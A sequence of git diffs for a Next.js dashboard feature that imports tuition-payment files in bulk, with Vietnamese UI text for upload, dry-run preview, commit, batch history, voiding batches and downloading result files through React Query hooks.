+  return Number.isNaN(d.getTime()) ? "—" : d.toLocaleString("vi-VN")
+}
+
+export function PaymentImportHistory() {
+  const [page, setPage] = useState(1)
+  const { data, isLoading, isError } = usePaymentImportBatches(page, PAGE_SIZE)
+
+  const totalPages = data ? Math.max(1, Math.ceil(data.total / PAGE_SIZE)) : 1
+
+  return (
+    <Card>
+      <CardHeader>
+        <CardTitle>Lịch sử lô import</CardTitle>
+        <CardDescription>
+          Các lô đã xem trước / ghi tiền / đảo (mới nhất trước).
+        </CardDescription>
+      </CardHeader>
+      <CardContent className="space-y-3">
+        {isLoading ? (
+          <TableSkeleton rows={5} />
+        ) : isError ? (
+          <ErrorEmptyState message="Không tải được lịch sử lô." />
+        ) : !data || data.items.length === 0 ? (
+          <TableEmptyState title="Chưa có lô import nào." />
+        ) : (
+          <>
+            <div className="overflow-auto rounded-lg border">
+              <Table>
+                <TableHeader>
+                  <TableRow>
+                    <TableHead className="w-12">#</TableHead>
+                    <TableHead>Năm / Kỳ</TableHead>
+                    <TableHead>File</TableHead>
+                    <TableHead>Trạng thái</TableHead>
+                    <TableHead className="text-center">
+                      Khớp / CB / Lỗi
+                    </TableHead>
+                    <TableHead className="text-right">Tổng tiền</TableHead>
+                    <TableHead>Tạo lúc</TableHead>
+                    <TableHead className="text-right">Thao tác</TableHead>
+                  </TableRow>
+                </TableHeader>
+                <TableBody>
+                  {data.items.map((b) => (
+                    <TableRow key={b.id}>
+                      <TableCell className="font-mono text-xs">{b.id}</TableCell>
+                      <TableCell className="whitespace-nowrap text-sm">
+                        HK{b.semester_no}/{b.academic_year}
+                      </TableCell>
+                      <TableCell className="max-w-[12rem] truncate text-sm">
+                        {b.file_name}
+                      </TableCell>
+                      <TableCell>
+                        <BatchStatusBadge status={b.status} />
+                      </TableCell>
+                      <TableCell className="text-center text-xs">
+                        <span className="text-green-700">{b.matched_count}</span>
+                        {" / "}
+                        <span className="text-amber-700">{b.warned_count}</span>
+                        {" / "}
+                        <span className="text-red-700">{b.failed_count}</span>
+                      </TableCell>
+                      <TableCell className="text-right">
+                        {formatAmount(b.total_amount)}
+                      </TableCell>
+                      <TableCell className="whitespace-nowrap text-xs text-muted-foreground">
+                        {formatDate(b.created_at)}
+                      </TableCell>
+                      <TableCell className="text-right">
+                        {b.can_void ? (
+                          <PaymentImportVoidDialog batchId={b.id} />
+                        ) : null}
+                      </TableCell>
+                    </TableRow>
+                  ))}
+                </TableBody>
+              </Table>
+            </div>
+
+            {/* Pagination */}
+            <div className="flex items-center justify-between text-sm">
+              <span className="text-muted-foreground">
+                Trang {page}/{totalPages} · {data.total} lô
+              </span>
+              <div className="flex gap-2">
+                <Button
+                  variant="outline"
+                  size="sm"
+                  disabled={page <= 1}
+                  onClick={() => setPage((p) => Math.max(1, p - 1))}
+                >
+                  <ChevronLeft className="h-4 w-4" />
+                </Button>
+                <Button
+                  variant="outline"
+                  size="sm"
+                  disabled={page >= totalPages}
+                  onClick={() => setPage((p) => p + 1)}
+                >
+                  <ChevronRight className="h-4 w-4" />
+                </Button>
+              </div>
+            </div>
+          </>
+        )}
+      </CardContent>
+    </Card>
+  )
+}

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportPreviewResult.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportPreviewResult.tsx
@@ -1,6 +1,6 @@
 "use client"
 
-import { CheckCircle2, Loader2 } from "lucide-react"
+import { CheckCircle2, Download, Loader2 } from "lucide-react"
 import { useState } from "react"
 
 import {
@@ -17,22 +17,16 @@ import {
 import { Button } from "@/components/ui/button"
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"
 import {
-  Table,
-  TableBody,
-  TableCell,
-  TableHead,
-  TableHeader,
-  TableRow,
-} from "@/components/ui/table"
-import { useCommitPaymentImport } from "@/hooks/finance/usePaymentImport"
+  useCommitPaymentImport,
+  useDownloadPaymentImportResult,
+} from "@/hooks/finance/usePaymentImport"
 import {
   formatAmount,
   type PaymentImportCommit,
   type PaymentImportPreview,
-  type PaymentImportRow,
 } from "@/lib/zod/payment-import"
 
-import { RowStatusBadge } from "./ImportStatusBadge"
+import { ImportRowsTable } from "./ImportRowsTable"
 
 interface Props {
   preview: PaymentImportPreview
@@ -57,74 +51,13 @@ function SummaryStat({
   )
 }
 
-const ROW_DISPLAY_CAP = 500
-
-function RowsTable({ rows }: { rows: PaymentImportRow[] }) {
-  const shown = rows.slice(0, ROW_DISPLAY_CAP)
-  return (
-    <div className="space-y-1">
-      <div className="max-h-[28rem] overflow-auto rounded-lg border">
-        <Table>
-          <TableHeader className="sticky top-0 bg-background">
-            <TableRow>
-              <TableHead className="w-14">Dòng</TableHead>
-              <TableHead>Trạng thái</TableHead>
-              <TableHead>CCCD</TableHead>
-              <TableHead className="text-right">Số tiền</TableHead>
-              <TableHead>Phân bổ / Ghi chú</TableHead>
-            </TableRow>
-          </TableHeader>
-          <TableBody>
-            {shown.map((r) => (
-            <TableRow key={r.row_no}>
-              <TableCell className="font-mono text-xs">{r.row_no}</TableCell>
-              <TableCell>
-                <RowStatusBadge status={r.status} />
-              </TableCell>
-              <TableCell className="font-mono text-xs">
-                {r.citizen_id ?? "—"}
-              </TableCell>
-              <TableCell className="text-right">{formatAmount(r.amount)}</TableCell>
-              <TableCell className="text-xs">
-                {r.allocations.length > 0 ? (
-                  <span className="text-muted-foreground">
-                    {r.allocations
-                      .map((a) => `Đợt ${a.installment_no}: ${formatAmount(a.amount)}`)
-                      .join(" · ")}
-                  </span>
-                ) : null}
-                {r.message ? (
-                  <span
-                    className={
-                      r.status === "error" ? "text-red-600" : "text-amber-600"
-                    }
-                  >
-                    {r.allocations.length > 0 ? " — " : ""}
-                    {r.message}
-                  </span>
-                ) : null}
-              </TableCell>
-            </TableRow>
-            ))}
-          </TableBody>
-        </Table>
-      </div>
-      {rows.length > ROW_DISPLAY_CAP ? (
-        <p className="text-xs text-muted-foreground">
-          Hiển thị {ROW_DISPLAY_CAP}/{rows.length} dòng đầu — xem file gốc để biết
-          đầy đủ.
-        </p>
-      ) : null}
-    </div>
-  )
-}
-
 export function PaymentImportPreviewResult({
   preview,
   onCommitted,
   onDiscard,
 }: Props) {
   const commit = useCommitPaymentImport()
+  const downloadResult = useDownloadPaymentImportResult()
   const [open, setOpen] = useState(false)
   const [committed, setCommitted] = useState<PaymentImportCommit | null>(null)
 
@@ -170,14 +103,27 @@ export function PaymentImportPreviewResult({
               <p className="text-sm font-medium text-red-700">
                 {errorRows.length} dòng KHÔNG ghi được (số dư đổi giữa preview→commit):
               </p>
-              <RowsTable rows={errorRows} />
+              <ImportRowsTable rows={errorRows} />
             </>
           ) : (
             <p className="text-sm text-green-700">
               Tất cả dòng hợp lệ đã ghi thành công.
             </p>
           )}
-          <div className="flex justify-end">
+          <div className="flex flex-wrap justify-end gap-2">
+            <Button
+              variant="outline"
+              disabled={downloadResult.isPending}
+              onClick={() =>
+                downloadResult.mutate({
+                  batchId: committed.batch_id,
+                  format: "xlsx",
+                })
+              }
+            >
+              <Download className="mr-1.5 h-4 w-4" />
+              Tải kết quả (Excel)
+            </Button>
             <Button onClick={onCommitted}>Xong</Button>
           </div>
         </CardContent>
@@ -222,7 +168,7 @@ export function PaymentImportPreviewResult({
           />
         </div>
 
-        <RowsTable rows={preview.rows} />
+        <ImportRowsTable rows={preview.rows} />
 
         <div className="flex flex-wrap items-center justify-end gap-2">
           <Button variant="ghost" onClick={onDiscard} disabled={commit.isPending}>

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportPreviewResult.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportPreviewResult.tsx
@@ -1,0 +1,271 @@
+"use client"
+
+import { CheckCircle2, Loader2 } from "lucide-react"
+import { useState } from "react"
+
+import {
+  AlertDialog,
+  AlertDialogAction,
+  AlertDialogCancel,
+  AlertDialogContent,
+  AlertDialogDescription,
+  AlertDialogFooter,
+  AlertDialogHeader,
+  AlertDialogTitle,
+  AlertDialogTrigger,
+} from "@/components/ui/alert-dialog"
+import { Button } from "@/components/ui/button"
+import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"
+import {
+  Table,
+  TableBody,
+  TableCell,
+  TableHead,
+  TableHeader,
+  TableRow,
+} from "@/components/ui/table"
+import { useCommitPaymentImport } from "@/hooks/finance/usePaymentImport"
+import {
+  formatAmount,
+  type PaymentImportCommit,
+  type PaymentImportPreview,
+  type PaymentImportRow,
+} from "@/lib/zod/payment-import"
+
+import { RowStatusBadge } from "./ImportStatusBadge"
+
+interface Props {
+  preview: PaymentImportPreview
+  onCommitted: () => void
+  onDiscard: () => void
+}
+
+function SummaryStat({
+  label,
+  value,
+  className,
+}: {
+  label: string
+  value: string | number
+  className?: string
+}) {
+  return (
+    <div className="rounded-lg border p-3">
+      <div className="text-xs text-muted-foreground">{label}</div>
+      <div className={`text-lg font-semibold ${className ?? ""}`}>{value}</div>
+    </div>
+  )
+}
+
+const ROW_DISPLAY_CAP = 500
+
+function RowsTable({ rows }: { rows: PaymentImportRow[] }) {
+  const shown = rows.slice(0, ROW_DISPLAY_CAP)
+  return (
+    <div className="space-y-1">
+      <div className="max-h-[28rem] overflow-auto rounded-lg border">
+        <Table>
+          <TableHeader className="sticky top-0 bg-background">
+            <TableRow>
+              <TableHead className="w-14">Dòng</TableHead>
+              <TableHead>Trạng thái</TableHead>
+              <TableHead>CCCD</TableHead>
+              <TableHead className="text-right">Số tiền</TableHead>
+              <TableHead>Phân bổ / Ghi chú</TableHead>
+            </TableRow>
+          </TableHeader>
+          <TableBody>
+            {shown.map((r) => (
+            <TableRow key={r.row_no}>
+              <TableCell className="font-mono text-xs">{r.row_no}</TableCell>
+              <TableCell>
+                <RowStatusBadge status={r.status} />
+              </TableCell>
+              <TableCell className="font-mono text-xs">
+                {r.citizen_id ?? "—"}
+              </TableCell>
+              <TableCell className="text-right">{formatAmount(r.amount)}</TableCell>
+              <TableCell className="text-xs">
+                {r.allocations.length > 0 ? (
+                  <span className="text-muted-foreground">
+                    {r.allocations
+                      .map((a) => `Đợt ${a.installment_no}: ${formatAmount(a.amount)}`)
+                      .join(" · ")}
+                  </span>
+                ) : null}
+                {r.message ? (
+                  <span
+                    className={
+                      r.status === "error" ? "text-red-600" : "text-amber-600"
+                    }
+                  >
+                    {r.allocations.length > 0 ? " — " : ""}
+                    {r.message}
+                  </span>
+                ) : null}
+              </TableCell>
+            </TableRow>
+            ))}
+          </TableBody>
+        </Table>
+      </div>
+      {rows.length > ROW_DISPLAY_CAP ? (
+        <p className="text-xs text-muted-foreground">
+          Hiển thị {ROW_DISPLAY_CAP}/{rows.length} dòng đầu — xem file gốc để biết
+          đầy đủ.
+        </p>
+      ) : null}
+    </div>
+  )
+}
+
+export function PaymentImportPreviewResult({
+  preview,
+  onCommitted,
+  onDiscard,
+}: Props) {
+  const commit = useCommitPaymentImport()
+  const [open, setOpen] = useState(false)
+  const [committed, setCommitted] = useState<PaymentImportCommit | null>(null)
+
+  const committable = preview.matched_count + preview.warned_count
+
+  const handleCommit = () => {
+    commit.mutate(preview.batch_id, {
+      onSuccess: (result) => {
+        setOpen(false)
+        setCommitted(result)
+      },
+    })
+  }
+
+  // ── Sau commit: hiện kết quả + dòng KHÔNG ghi được (TOCTOU) thay vì giấu ──
+  if (committed) {
+    const errorRows = committed.rows.filter((r) => r.status === "error")
+    return (
+      <Card>
+        <CardHeader>
+          <CardTitle>Kết quả ghi tiền — lô #{committed.batch_id}</CardTitle>
+        </CardHeader>
+        <CardContent className="space-y-4">
+          <div className="grid grid-cols-2 gap-3 sm:grid-cols-4">
+            <SummaryStat
+              label="Đã ghi"
+              value={committed.committed_count}
+              className="text-green-700"
+            />
+            <SummaryStat
+              label="Lỗi"
+              value={committed.failed_count}
+              className="text-red-700"
+            />
+            <SummaryStat label="Số Payment" value={committed.payment_count} />
+            <SummaryStat
+              label="Tổng đã ghi"
+              value={formatAmount(committed.total_amount)}
+            />
+          </div>
+          {errorRows.length > 0 ? (
+            <>
+              <p className="text-sm font-medium text-red-700">
+                {errorRows.length} dòng KHÔNG ghi được (số dư đổi giữa preview→commit):
+              </p>
+              <RowsTable rows={errorRows} />
+            </>
+          ) : (
+            <p className="text-sm text-green-700">
+              Tất cả dòng hợp lệ đã ghi thành công.
+            </p>
+          )}
+          <div className="flex justify-end">
+            <Button onClick={onCommitted}>Xong</Button>
+          </div>
+        </CardContent>
+      </Card>
+    )
+  }
+
+  // ── Trước commit: xem trước 3 nhóm ──
+  return (
+    <Card>
+      <CardHeader>
+        <CardTitle className="flex items-center justify-between gap-2">
+          <span>
+            Xem trước lô #{preview.batch_id} — HK{preview.semester_no}/
+            {preview.academic_year}
+          </span>
+          <span className="truncate text-sm font-normal text-muted-foreground">
+            {preview.file_name}
+          </span>
+        </CardTitle>
+      </CardHeader>
+      <CardContent className="space-y-4">
+        <div className="grid grid-cols-2 gap-3 sm:grid-cols-4">
+          <SummaryStat
+            label="Khớp"
+            value={preview.matched_count}
+            className="text-green-700"
+          />
+          <SummaryStat
+            label="Cảnh báo"
+            value={preview.warned_count}
+            className="text-amber-700"
+          />
+          <SummaryStat
+            label="Lỗi"
+            value={preview.failed_count}
+            className="text-red-700"
+          />
+          <SummaryStat
+            label="Tổng dự kiến"
+            value={formatAmount(preview.total_amount)}
+          />
+        </div>
+
+        <RowsTable rows={preview.rows} />
+
+        <div className="flex flex-wrap items-center justify-end gap-2">
+          <Button variant="ghost" onClick={onDiscard} disabled={commit.isPending}>
+            Hủy / chọn file khác
+          </Button>
+          <AlertDialog open={open} onOpenChange={setOpen}>
+            <AlertDialogTrigger asChild>
+              <Button disabled={committable === 0 || commit.isPending}>
+                {commit.isPending ? (
+                  <Loader2 className="mr-1.5 h-4 w-4 animate-spin" />
+                ) : (
+                  <CheckCircle2 className="mr-1.5 h-4 w-4" />
+                )}
+                Ghi tiền ({committable} dòng)
+              </Button>
+            </AlertDialogTrigger>
+            <AlertDialogContent>
+              <AlertDialogHeader>
+                <AlertDialogTitle>Xác nhận ghi tiền</AlertDialogTitle>
+                <AlertDialogDescription>
+                  Hệ thống sẽ tự xác minh và ghi nhận {committable} khoản thu (tổng
+                  dự kiến {formatAmount(preview.total_amount)}). Thao tác này ghi
+                  tiền vào hồ sơ; muốn rút lại phải đảo (void) lô. Tiếp tục?
+                </AlertDialogDescription>
+              </AlertDialogHeader>
+              <AlertDialogFooter>
+                <AlertDialogCancel disabled={commit.isPending}>
+                  Hủy
+                </AlertDialogCancel>
+                <AlertDialogAction
+                  onClick={(e) => {
+                    e.preventDefault()
+                    handleCommit()
+                  }}
+                  disabled={commit.isPending}
+                >
+                  Ghi tiền
+                </AlertDialogAction>
+              </AlertDialogFooter>
+            </AlertDialogContent>
+          </AlertDialog>
+        </div>
+      </CardContent>
+    </Card>
+  )
+}

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportUploadCard.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportUploadCard.tsx
@@ -1,0 +1,192 @@
+"use client"
+
+import { Download, Eye, Loader2, Upload } from "lucide-react"
+import { useRef, useState } from "react"
+import { toast } from "sonner"
+
+import { Button } from "@/components/ui/button"
+import {
+  Card,
+  CardContent,
+  CardDescription,
+  CardHeader,
+  CardTitle,
+} from "@/components/ui/card"
+import { Input } from "@/components/ui/input"
+import { Label } from "@/components/ui/label"
+import {
+  Select,
+  SelectContent,
+  SelectItem,
+  SelectTrigger,
+  SelectValue,
+} from "@/components/ui/select"
+import {
+  useDownloadPaymentImportTemplate,
+  usePreviewPaymentImport,
+} from "@/hooks/finance/usePaymentImport"
+import {
+  paymentImportPreviewFormSchema,
+  type PaymentImportPreview,
+} from "@/lib/zod/payment-import"
+
+const ACCEPT = ".xlsx,.csv"
+const MAX_BYTES = 8 * 1024 * 1024 // khớp backend _MAX_IMPORT_FILE_BYTES
+
+interface Props {
+  onPreview: (preview: PaymentImportPreview) => void
+}
+
+export function PaymentImportUploadCard({ onPreview }: Props) {
+  const [file, setFile] = useState<File | null>(null)
+  const [academicYear, setAcademicYear] = useState<string>(
+    String(new Date().getFullYear()),
+  )
+  const [semesterNo, setSemesterNo] = useState<string>("1")
+  const fileInputRef = useRef<HTMLInputElement>(null)
+
+  const download = useDownloadPaymentImportTemplate()
+  const preview = usePreviewPaymentImport()
+
+  const handlePickFile = (e: React.ChangeEvent<HTMLInputElement>) => {
+    const f = e.target.files?.[0] ?? null
+    if (f && f.size > MAX_BYTES) {
+      toast.error("File vượt giới hạn 8MB")
+      e.target.value = ""
+      return
+    }
+    setFile(f)
+  }
+
+  const handlePreview = () => {
+    if (!file) {
+      toast.error("Vui lòng chọn file .xlsx hoặc .csv")
+      return
+    }
+    const parsed = paymentImportPreviewFormSchema.safeParse({
+      academic_year: academicYear,
+      semester_no: semesterNo,
+    })
+    if (!parsed.success) {
+      toast.error(parsed.error.issues[0]?.message ?? "Năm học / học kỳ không hợp lệ")
+      return
+    }
+    preview.mutate(
+      {
+        file,
+        academicYear: parsed.data.academic_year,
+        semesterNo: parsed.data.semester_no,
+      },
+      { onSuccess: onPreview },
+    )
+  }
+
+  return (
+    <Card>
+      <CardHeader>
+        <CardTitle>Import thu học phí hàng loạt</CardTitle>
+        <CardDescription>
+          Tải file mẫu → điền số tiền đã thu offline → tải lên để hệ thống đối
+          chiếu và tự xác minh. Cột CCCD + Mã tham chiếu định dạng TEXT (giữ số 0
+          đầu). Số tiền là GỐC học phí.
+        </CardDescription>
+      </CardHeader>
+      <CardContent className="space-y-5">
+        {/* Tải file mẫu */}
+        <div className="flex flex-wrap items-center gap-2">
+          <span className="text-sm font-medium text-muted-foreground">
+            File mẫu:
+          </span>
+          <Button
+            type="button"
+            variant="outline"
+            size="sm"
+            disabled={download.isPending}
+            onClick={() => download.mutate("xlsx")}
+          >
+            <Download className="mr-1.5 h-4 w-4" />
+            Tải mẫu Excel
+          </Button>
+          <Button
+            type="button"
+            variant="outline"
+            size="sm"
+            disabled={download.isPending}
+            onClick={() => download.mutate("csv")}
+          >
+            <Download className="mr-1.5 h-4 w-4" />
+            Tải mẫu CSV
+          </Button>
+        </div>
+
+        {/* Cấp lô: năm + kỳ */}
+        <div className="grid gap-4 sm:grid-cols-2">
+          <div className="space-y-1.5">
+            <Label htmlFor="academic-year">Năm học</Label>
+            <Input
+              id="academic-year"
+              type="number"
+              min={2020}
+              max={2100}
+              value={academicYear}
+              onChange={(e) => setAcademicYear(e.target.value)}
+            />
+          </div>
+          <div className="space-y-1.5">
+            <Label htmlFor="semester">Học kỳ</Label>
+            <Select value={semesterNo} onValueChange={setSemesterNo}>
+              <SelectTrigger id="semester">
+                <SelectValue placeholder="Chọn học kỳ" />
+              </SelectTrigger>
+              <SelectContent>
+                {Array.from({ length: 12 }, (_, i) => i + 1).map((s) => (
+                  <SelectItem key={s} value={String(s)}>
+                    Học kỳ {s}
+                  </SelectItem>
+                ))}
+              </SelectContent>
+            </Select>
+          </div>
+        </div>
+
+        {/* Chọn file */}
+        <div className="space-y-1.5">
+          <Label>File thu học phí (.xlsx / .csv)</Label>
+          <div className="flex flex-wrap items-center gap-2">
+            <input
+              ref={fileInputRef}
+              type="file"
+              accept={ACCEPT}
+              onChange={handlePickFile}
+              className="hidden"
+            />
+            <Button
+              type="button"
+              variant="secondary"
+              onClick={() => fileInputRef.current?.click()}
+            >
+              <Upload className="mr-1.5 h-4 w-4" />
+              Chọn file
+            </Button>
+            <span className="truncate text-sm text-muted-foreground">
+              {file?.name ?? "Chưa chọn file"}
+            </span>
+          </div>
+        </div>
+
+        <Button
+          type="button"
+          onClick={handlePreview}
+          disabled={preview.isPending || !file}
+        >
+          {preview.isPending ? (
+            <Loader2 className="mr-1.5 h-4 w-4 animate-spin" />
+          ) : (
+            <Eye className="mr-1.5 h-4 w-4" />
+          )}
+          Xem trước (dry-run)
+        </Button>
+      </CardContent>
+    </Card>
+  )
+}

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportVoidDialog.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportVoidDialog.tsx
@@ -1,0 +1,103 @@
+"use client"
+
+import { Loader2, Undo2 } from "lucide-react"
+import { useState } from "react"
+
+import { Button } from "@/components/ui/button"
+import {
+  Dialog,
+  DialogContent,
+  DialogDescription,
+  DialogFooter,
+  DialogHeader,
+  DialogTitle,
+  DialogTrigger,
+} from "@/components/ui/dialog"
+import { Label } from "@/components/ui/label"
+import { Textarea } from "@/components/ui/textarea"
+import { useVoidPaymentImport } from "@/hooks/finance/usePaymentImport"
+import { paymentImportVoidFormSchema } from "@/lib/zod/payment-import"
+
+interface Props {
+  batchId: number
+}
+
+export function PaymentImportVoidDialog({ batchId }: Props) {
+  const [open, setOpen] = useState(false)
+  const [reason, setReason] = useState("")
+  const [error, setError] = useState<string | null>(null)
+  const voidBatch = useVoidPaymentImport()
+
+  // Reset reason/error khi đóng (Esc/overlay/Hủy) → mở lại không dính state cũ.
+  const handleOpenChange = (next: boolean) => {
+    setOpen(next)
+    if (!next) {
+      setReason("")
+      setError(null)
+    }
+  }
+
+  const handleConfirm = () => {
+    const parsed = paymentImportVoidFormSchema.safeParse({ reason })
+    if (!parsed.success) {
+      setError(parsed.error.issues[0]?.message ?? "Lý do không hợp lệ")
+      return
+    }
+    setError(null)
+    voidBatch.mutate(
+      { batchId, reason: parsed.data.reason },
+      { onSuccess: () => handleOpenChange(false) },
+    )
+  }
+
+  return (
+    <Dialog open={open} onOpenChange={handleOpenChange}>
+      <DialogTrigger asChild>
+        <Button variant="outline" size="sm">
+          <Undo2 className="mr-1.5 h-4 w-4" />
+          Đảo lô
+        </Button>
+      </DialogTrigger>
+      <DialogContent>
+        <DialogHeader>
+          <DialogTitle>Đảo (void) lô #{batchId}</DialogTitle>
+          <DialogDescription>
+            Rút lại toàn bộ khoản thu đã ghi của lô này (hoàn về invoice/học phí)
+            và mở lại file để import lại. Chỉ quản lý/admin. Nhập lý do để lưu
+            vết.
+          </DialogDescription>
+        </DialogHeader>
+        <div className="space-y-1.5">
+          <Label htmlFor="void-reason">Lý do đảo lô</Label>
+          <Textarea
+            id="void-reason"
+            value={reason}
+            onChange={(e) => setReason(e.target.value)}
+            placeholder="VD: import nhầm năm học / sai hồ sơ…"
+            rows={3}
+          />
+          {error ? <p className="text-sm text-red-600">{error}</p> : null}
+        </div>
+        <DialogFooter>
+          <Button
+            variant="ghost"
+            onClick={() => handleOpenChange(false)}
+            disabled={voidBatch.isPending}
+          >
+            Hủy
+          </Button>
+          <Button
+            variant="destructive"
+            onClick={handleConfirm}
+            disabled={voidBatch.isPending}
+          >
+            {voidBatch.isPending ? (
+              <Loader2 className="mr-1.5 h-4 w-4 animate-spin" />
+            ) : null}
+            Xác nhận đảo lô
+          </Button>
+        </DialogFooter>
+      </DialogContent>
+    </Dialog>
+  )
+}

--- a/frontend/src/app/(dashboard)/finance/payments/import/page.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/page.tsx
@@ -1,0 +1,12 @@
+import type { Metadata } from "next"
+
+import { PaymentImportClient } from "./_components/PaymentImportClient"
+
+export const metadata: Metadata = {
+  title: "Import thu học phí | QLTS",
+  description: "Import file tổng hợp → tự xác minh thanh toán học phí hàng loạt",
+}
+
+export default function PaymentImportPage() {
+  return <PaymentImportClient />
+}

--- a/frontend/src/hooks/finance/usePaymentImport.ts
+++ b/frontend/src/hooks/finance/usePaymentImport.ts
@@ -13,6 +13,7 @@ import { AxiosError, isAxiosError } from "axios"
 import { toast } from "sonner"
 
 import { paymentImportApi } from "@/lib/api/payment-import"
+import { blobErrorMessage, downloadBlob } from "@/lib/utils/download-blob"
 import type {
   PaymentImportCommit,
   PaymentImportPreview,
@@ -27,6 +28,8 @@ export const paymentImportKeys = {
   all: ["payment-import"] as const,
   batches: (page: number, pageSize: number) =>
     [...paymentImportKeys.all, "batches", page, pageSize] as const,
+  detail: (batchId: number) =>
+    [...paymentImportKeys.all, "detail", batchId] as const,
 }
 
 function errMsg(error: unknown, fallback: string): string {
@@ -57,33 +60,10 @@ export function usePaymentImportBatches(page: number, pageSize: number) {
 export function useDownloadPaymentImportTemplate() {
   return useMutation<Blob, AxiosError<ApiErrorResponse>, "xlsx" | "csv">({
     mutationFn: (format) => paymentImportApi.downloadTemplate(format),
-    onSuccess: (blob, format) => {
-      const url = URL.createObjectURL(blob)
-      const link = document.createElement("a")
-      link.href = url
-      link.download = `mau_import_thu_hoc_phi.${format}`
-      document.body.appendChild(link)
-      link.click()
-      link.remove()
-      URL.revokeObjectURL(url)
-    },
-    onError: async (error) => {
-      // responseType:'blob' → body lỗi (JSON) bị bọc thành Blob → đọc text để lấy
-      // detail thật thay vì luôn fallback.
-      let msg = "Không tải được file mẫu"
-      const data = error.response?.data as unknown
-      if (data instanceof Blob) {
-        try {
-          const parsed = JSON.parse(await data.text())
-          if (typeof parsed?.detail === "string") msg = parsed.detail
-        } catch {
-          /* blob không phải JSON → giữ fallback */
-        }
-      } else {
-        msg = errMsg(error, msg)
-      }
-      toast.error(msg)
-    },
+    onSuccess: (blob, format) =>
+      downloadBlob(blob, `mau_import_thu_hoc_phi.${format}`),
+    onError: async (error) =>
+      toast.error(await blobErrorMessage(error, "Không tải được file mẫu")),
   })
 }
 
@@ -137,5 +117,32 @@ export function useVoidPaymentImport() {
       queryClient.invalidateQueries({ queryKey: paymentImportKeys.all })
     },
     onError: (error) => toast.error(errMsg(error, "Không đảo được lô import")),
+  })
+}
+
+// ============================================================================
+// BV-5 R2 — chi tiết lô (per-row) · R1 — tải file kết quả
+// ============================================================================
+export function usePaymentImportBatchDetail(batchId: number, enabled: boolean) {
+  return useQuery({
+    queryKey: paymentImportKeys.detail(batchId),
+    queryFn: () => paymentImportApi.getBatchDetail(batchId),
+    enabled,
+    staleTime: 30_000,
+  })
+}
+
+export function useDownloadPaymentImportResult() {
+  return useMutation<
+    Blob,
+    AxiosError<ApiErrorResponse>,
+    { batchId: number; format: "xlsx" | "csv" }
+  >({
+    mutationFn: ({ batchId, format }) =>
+      paymentImportApi.downloadResult(batchId, format),
+    onSuccess: (blob, { batchId, format }) =>
+      downloadBlob(blob, `ket_qua_import_lo_${batchId}.${format}`),
+    onError: async (error) =>
+      toast.error(await blobErrorMessage(error, "Không tải được file kết quả")),
   })
 }

--- a/frontend/src/hooks/finance/usePaymentImport.ts
+++ b/frontend/src/hooks/finance/usePaymentImport.ts
@@ -94,7 +94,9 @@ export function useCommitPaymentImport() {
         `Đã ghi ${result.committed_count} dòng` +
           (result.failed_count > 0 ? `, ${result.failed_count} lỗi` : ""),
       )
-      queryClient.invalidateQueries({ queryKey: paymentImportKeys.all })
+      // return → mutation pending tới khi cache refetch xong (tránh thao tác tiếp
+      // trên dữ liệu cũ; convention await-invalidate của repo).
+      return queryClient.invalidateQueries({ queryKey: paymentImportKeys.all })
     },
     onError: (error) => toast.error(errMsg(error, "Không ghi được tiền lô import")),
   })
@@ -114,7 +116,9 @@ export function useVoidPaymentImport() {
       paymentImportApi.voidBatch(batchId, reason),
     onSuccess: (result) => {
       toast.success(`Đã đảo lô — rút lại ${result.reversed_count} khoản`)
-      queryClient.invalidateQueries({ queryKey: paymentImportKeys.all })
+      // return → mutation pending tới khi cache refetch xong: dòng History hết stale
+      // can_void → chặn double-void (409). Convention await-invalidate của repo.
+      return queryClient.invalidateQueries({ queryKey: paymentImportKeys.all })
     },
     onError: (error) => toast.error(errMsg(error, "Không đảo được lô import")),
   })

--- a/frontend/src/hooks/finance/usePaymentImport.ts
+++ b/frontend/src/hooks/finance/usePaymentImport.ts
@@ -1,0 +1,141 @@
+/**
+ * React Query hooks — Import file thu học phí hàng loạt (BV-4).
+ *
+ * @see lib/api/payment-import.ts
+ */
+import {
+  keepPreviousData,
+  useMutation,
+  useQuery,
+  useQueryClient,
+} from "@tanstack/react-query"
+import { AxiosError, isAxiosError } from "axios"
+import { toast } from "sonner"
+
+import { paymentImportApi } from "@/lib/api/payment-import"
+import type {
+  PaymentImportCommit,
+  PaymentImportPreview,
+  PaymentImportVoidResult,
+} from "@/lib/zod/payment-import"
+import type { ApiErrorResponse } from "@/types/api.types"
+
+// ============================================================================
+// QUERY KEYS
+// ============================================================================
+export const paymentImportKeys = {
+  all: ["payment-import"] as const,
+  batches: (page: number, pageSize: number) =>
+    [...paymentImportKeys.all, "batches", page, pageSize] as const,
+}
+
+function errMsg(error: unknown, fallback: string): string {
+  if (isAxiosError(error)) {
+    const detail = (error.response?.data as ApiErrorResponse | undefined)?.detail
+    return typeof detail === "string" ? detail : fallback
+  }
+  // ZodError (contract drift) / lỗi khác → log cho dev, user thấy fallback rõ
+  console.error("[payment-import] unexpected error", error)
+  return fallback
+}
+
+// ============================================================================
+// LỊCH SỬ LÔ (list)
+// ============================================================================
+export function usePaymentImportBatches(page: number, pageSize: number) {
+  return useQuery({
+    queryKey: paymentImportKeys.batches(page, pageSize),
+    queryFn: () => paymentImportApi.listBatches(page, pageSize),
+    staleTime: 30_000,
+    placeholderData: keepPreviousData, // đổi trang → giữ data cũ, không nháy spinner
+  })
+}
+
+// ============================================================================
+// TẢI FILE MẪU (download blob → trigger browser save)
+// ============================================================================
+export function useDownloadPaymentImportTemplate() {
+  return useMutation<Blob, AxiosError<ApiErrorResponse>, "xlsx" | "csv">({
+    mutationFn: (format) => paymentImportApi.downloadTemplate(format),
+    onSuccess: (blob, format) => {
+      const url = URL.createObjectURL(blob)
+      const link = document.createElement("a")
+      link.href = url
+      link.download = `mau_import_thu_hoc_phi.${format}`
+      document.body.appendChild(link)
+      link.click()
+      link.remove()
+      URL.revokeObjectURL(url)
